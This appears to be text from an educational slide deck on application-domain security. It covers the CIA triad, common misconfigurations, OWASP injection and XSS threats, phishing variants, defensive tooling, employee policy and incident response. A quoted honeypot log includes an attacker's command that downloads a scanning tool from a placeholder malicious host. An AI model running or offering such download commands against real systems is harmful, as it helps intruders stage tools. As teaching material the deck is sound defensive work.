Birlin, Bonds, Ramani and Reeds The system/application domain consists of all of a business’s mission-critical systems, applications, and data. It is important to ensure that this domain is secure at all times, otherwise a business could easily lose large amounts of sensitive information as well as face the threat of having productivity come to a halt. Common targeted systems and applications are operating systems (desktop, server, and network), e-mail applications and servers, Enterprise Resource Planning (ERP) applications and systems, and web browsers. Confidentiality: A requirement that private or confidential information not be disclosed to unauthorized individual. This issues related to this are: Network security protocols Network authentication services Data encryption services HIPAA Fines Sox Violations Users will lose confidence that their data is not secure. Loss of customers. Supply Chain Risk Integrity: Data integrity is a requirement that information and programs are changed only in a specified and authorized manner. System integrity is a requirement that a system performs its intended function in an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the system. Issues related to this are: Firewall services Communications security management Intrusion detection services Data Corruption Unsure of good points to roll back to. Loss of confidence in users and customers Possible HIPAA or Sox Fines. Users may not see accurate data, much less believe the data! Availability: A requirement intended to ensure that systems work promptly and service is not denied to authorized users. Typically, non critical applications should stay available 99.5% of the time, and critical are 99.9%. Critical apps typically are: Supply Chain HR Accounting Issues related to availability are: Fault tolerance for data availability (back-ups, redundant disk systems) Acceptable log-ins and operating process performance Reliable and interoperable security processes and network security mechanisms3 Workers are not able to complete their tasks in a timely manner. Loss of confidence from customers and users. Calls and services abandoned by users. Users and Customers will find a provider that can meet their SLA Requirements! Up to 20 years prison Time. Fines from $100k to $5M. physical environment of the system the personnel management administration procedures and security measures within the organization business operation and service delivery hardware software communication equipment and facilities and their combinations. Surveillance Cameras not installed in server rooms to deter unauthorized access. Application and Database servers not placed in a server room which is secured by key pad or lock. Hardware loggers Application Servers sitting under people’s desks! Employees who improperly download software to their machines run the risk of installing malware with it. Employee machines should not be issued with employee rights so that they can install unauthorized software. Employee’s machines installs can be monitored using a tool such as Eracent. There is a tendency to grant too much rights to users. Default should not be an administrator, but a lesser set of roles. Systems administrators do not set up firewalls, servers, databases and OS software properly to prevent attacks. The reason is that additional security protocols adds a higher level of rigor in day to day operations. Sensitive Folders use common names, such as Admin. Tells your attacker exactly where to look. Sadly, many recommendation guidelines tell your user to do exactly this! Improper Folder setup, allowing your attacker to browse the contents of your site. Improper setup of error handling, giving a stack trace of your code to the outside user when exceptions thrown. As the name suggests, this vulnerability allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability. Products which had this: phpbb, Invision Board, Cpanel, Paypal cart, Drupal, and many others Default Configuration of many sites are setup in a way that users of the site have full privileges! Sensitive Data is commonly exposed to the outside world. Software not kept up to date. Some server admins are not vigililent in ensuring the latest versions of application software are installed on desktops. Last year saw some particularly attacks through Java, Acrobat and Flash. These attacks could have been prevented by proper patching. There are a multitude of add ons for your web applications, however web administrators do not properly lock down these user based reports. Worldwide, 170K Awstats reports are available. ELMAH Error handling can be found by good attackers which give full stack traces! Application Domain is a high risk domain now. Improper and lax security techniques plus high reward targets means risks will continue through the future Users with low knowledge base also means attackers have ripe opportunities there also. Nonprofit organization not attached to any software company. Releases a list of top 10 security threats on an annual basis, for both desktop and mobile platforms. Core Purpose: Be the thriving global community that drives visibility and evolution in the safety and security of the world’s software. Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate. SQL, LDAP and OS Injection still rank as the #1 threat per OWASP. Allows attackers to inject javascript code into your hosted page, thus executing malware on your own site. Textboxes are where this code can be inserted. Data saved into the database can then be used against other users of the site. In other words, I’m hosting my own malware! 84% of all security vulnerabilities as documented by Symantec https://www.youtube.com/watch?v=qO3iwA xkPxE https://www.youtube.com/watch?v=FwIUkA wKzG8 Allows attackers to compromise session tokens, keys to assume other user’s identities. If the session ID is compromised, attackers can impersonate other users on the system. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Spear phishing Phishing attempts directed at specific individuals or companies have been termed spearphishing.[35] Attackers may gather personal information about their target to increase their probability of success. Clone phishing A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email. Whaling Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks The motivation behind defacing websites is to obtain peer recognition in the attacker’s community. Also, used by politically motivated hacktivists or cyber protestors Usually done by SQL Injector or Compromised FTP Much more difficult to defend against. Typically has to do with loss of reputation in the community at large which causes these types of attacks. PHPShell is a PHP script which allows shell commands to be executed on a web server. Typically the PHPShell script is protected by a password so only the server administrator can access it. We deployed honeypots that advertise an unrestricted PHPShell application, which attackers often tried to exploit. Among other tools, attackers commonly downloaded and attempted to use a variant of pscan. Pscan is an efficient port scanner that can discover hosts which are listening on a particular port. Typically, the attacker would run the tool, obtain a list of hosts with the port open and then proceed to run an exploit tool against the list of hosts. Date: 2006-09-09 12:20:40 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 Command: wget http://evil.example.com/linux/fast.tgz Port Scans are commonly run. Common ports to open are typically scanned, like 80, 8080, 8081. What is our defense strategy if we are attacked? How are we preparing to prevent an attack? Who is engaged in the defense of our company? Application Scanning Tools: Code analysis can be done using a tool such as HP Fortify. Simulated Attacks: Allows all attacks to be performed on the site using a tool such as HP WebInspect. First rule- NEVER TRUST YOUR USERS. Validation Techniques from MS Stack Date Range Custom Validation Numeric Range Validation Regular Expression Validation Comparison Validation String encoding of data before it goes to the server. Otherwise known as sanitizing your inputs. Antixss for the MS Stack and AntiSami for the Java domain Data from the web: I'm here to stay! Encoded: I%27m%20here%20to%20stay! PII Should always be encrypted in the database. Credit Card Information should always be encrypted. SSL Should be used for all sensitive communications between your server and user. Proper VPN Tunnels should be set up for remote users A security department should be implemented which monitors all incoming and outgoing traffic. Monitors all traffic to the enterprise Should be a vigilant process instead of addressing attacks (no more whack a mole) Users that are logged into the website should have some sort of audit trail on their actions, as to determine the history of these users. Database log of inserts, adds and deletes allows us to track malicious activity by insiders. ELMAH Audit trail allows us to provide error logging hidden from the user. Be ready to force enterprise wide password changes should an attacker obtain elevated privileges. Isolate the environment from the Internet. Block egress traffic to known malicious C2 IP addresses and domains. Block dynamic DNS providers. Rebuild or replace compromised systems. Do employees know what to do if their machines are compromised? Do employees know how to tell good emails from bad ones? Do employees know what to do with suspicious emails? Define computers, e-mail, Internet, and so on as broadly as possible, with specifics given, but not limited to such specifics Remind employees that not only job loss, but also civil liability and criminal prosecution may result from certain actions (illegal pornography, participation in spamming operations or other scams, involvement in computer hacking (see 18 U.S.C. § 1030, among other laws)) Company needs to reserve the right to monitor all computer usage at all times for compliance with the policy Right to inspect an employee's computer, HD, floppy disks, and other media at any time Right to withdraw access to computers, Internet, e-mail if needed Consider prohibiting camera phones (also called cell phone cameras); such phones have been implicated in gross invasions of other employees' privacy and in theft of company secrets Make sure employees know they have no reasonable expectation of privacy in their use of the company's electronic resources, since it is all company property and to be used only for job-related purposes So our company’s assets have been compromised. What’s next? The best line of defense is having a response strategy in place, from compromised assets to whole system loss. 1. Identify the last known time our system’s data was stable. 2. Pull the data back ups from that time, whether it be on disk or by tape. 3. Restore the data to the last known good data point. Notify customers and users through out the process of the data loss. Self-Report to authorities of possible HIPAA or Sox Violations. Notify customer immediately of breach, and possible data leakage, and advise them to change their passwords. Identify the source of the breach, through system logs, network logs and data logs. Notify authorities and press of the breach to stay in front of the situation. Identify the source of the system outage. Acquire proper backups of systems to stand up in a different physical location. Restore our systems to new servers if need be. Blackhole DNS attacks to spoofed IP Address.